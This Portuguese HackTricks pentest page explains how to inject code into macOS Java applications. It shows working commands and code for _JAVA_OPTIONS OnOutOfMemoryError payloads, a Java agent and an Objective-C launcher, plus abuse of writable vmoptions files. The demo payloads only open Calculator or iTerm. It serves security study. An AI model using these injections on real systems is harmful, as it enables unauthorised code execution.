# Injeção em Aplicações Java no macOS <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * **Junte-se ao grupo do** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe suas técnicas de hacking enviando PRs para o repositório** [**hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). </details> ## Enumeração Encontre aplicações Java instaladas no seu sistema. Foi observado que aplicações Java no **Info.plist** conterão alguns parâmetros java que contêm a string **`java.`**, então você pode procurar por isso: ```bash # Search only in /Applications folder sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null # Full search sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null ``` ## \_JAVA\_OPTIONS A variável de ambiente **`_JAVA_OPTIONS`** pode ser usada para injetar parâmetros java arbitrários na execução de um app compilado em java: ```bash # Write your payload in a script called /tmp/payload.sh export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"' "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub" ``` Para executá-lo como um novo processo e não como filho do terminal atual, você pode usar: ```objectivec #import <Foundation/Foundation.h> // clang -fobjc-arc -framework Foundation invoker.m -o invoker int main(int argc, const char * argv[]) { @autoreleasepool { // Specify the file path and content NSString *filePath = @"/tmp/payload.sh"; NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2"; NSError *error = nil; // Write content to the file BOOL success = [content writeToFile:filePath atomically:YES encoding:NSUTF8StringEncoding error:&error]; if (!success) { NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]); return 1; } NSLog(@"File written successfully to %@", filePath); // Create a new task NSTask *task = [[NSTask alloc] init]; /// Set the task's launch path to use the 'open' command [task setLaunchPath:@"/usr/bin/open"]; // Arguments for the 'open' command, specifying the path to Android Studio [task setArguments:@[@"/Applications/Android Studio.app"]]; // Define custom environment variables NSDictionary *customEnvironment = @{ @"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh" }; // Get the current environment and merge it with custom variables NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]]; [environment addEntriesFromDictionary:customEnvironment]; // Set the task's environment [task setEnvironment:environment]; // Launch the task [task launch]; } return 0; } ``` No entanto, isso acionará um erro no aplicativo executado, outra maneira mais discreta é criar um agente java e usar: ```bash export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar' "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub" # Or open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional" ``` {% hint style="danger" %} Criar o agente com uma **versão Java diferente** da aplicação pode causar a falha na execução tanto do agente quanto da aplicação. {% endhint %} Onde o agente pode ser: {% code title="Agent.java" %} ```java import java.io.*; import java.lang.instrument.*; public class Agent { public static void premain(String args, Instrumentation inst) { try { String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" }; Runtime.getRuntime().exec(commands); } catch (Exception err) { err.printStackTrace(); } } } ``` ```markdown Para compilar o agente, execute: ``` ```bash javac Agent.java # Create Agent.class jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar ``` Com `manifest.txt`: ``` Premain-Class: Agent Agent-Class: Agent Can-Redefine-Classes: true Can-Retransform-Classes: true ``` E então exporte a variável de ambiente e execute o aplicativo java como: ```bash export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar' "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub" # Or open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional" ``` ## arquivo vmoptions Este arquivo suporta a especificação de **parâmetros Java** quando o Java é executado. Você poderia usar algumas das técnicas anteriores para alterar os parâmetros java e **fazer o processo executar comandos arbitrários**.\ Além disso, este arquivo também pode **incluir outros** com o diretório `include`, então você também poderia alterar um arquivo incluído. Ainda mais, algumas aplicações Java irão **carregar mais de um arquivo `vmoptions`**. Algumas aplicações como o Android Studio indicam em seu **output onde estão procurando** por esses arquivos, como: ```bash /Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions 2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions 2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions 2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions 2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions 2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions 2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions ``` Se não o fizerem, você pode facilmente verificar com: ```bash # Monitor sudo eslogger lookup | grep vmoption # Give FDA to the Terminal # Launch the Java app /Applications/Android\ Studio.app/Contents/MacOS/studio ``` Note como é interessante que o Android Studio, neste exemplo, está tentando carregar o arquivo **`/Applications/Android Studio.app.vmoptions`**, um local onde qualquer usuário do grupo **`admin`** tem acesso de escrita. <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Você trabalha em uma **empresa de cybersecurity**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). </details>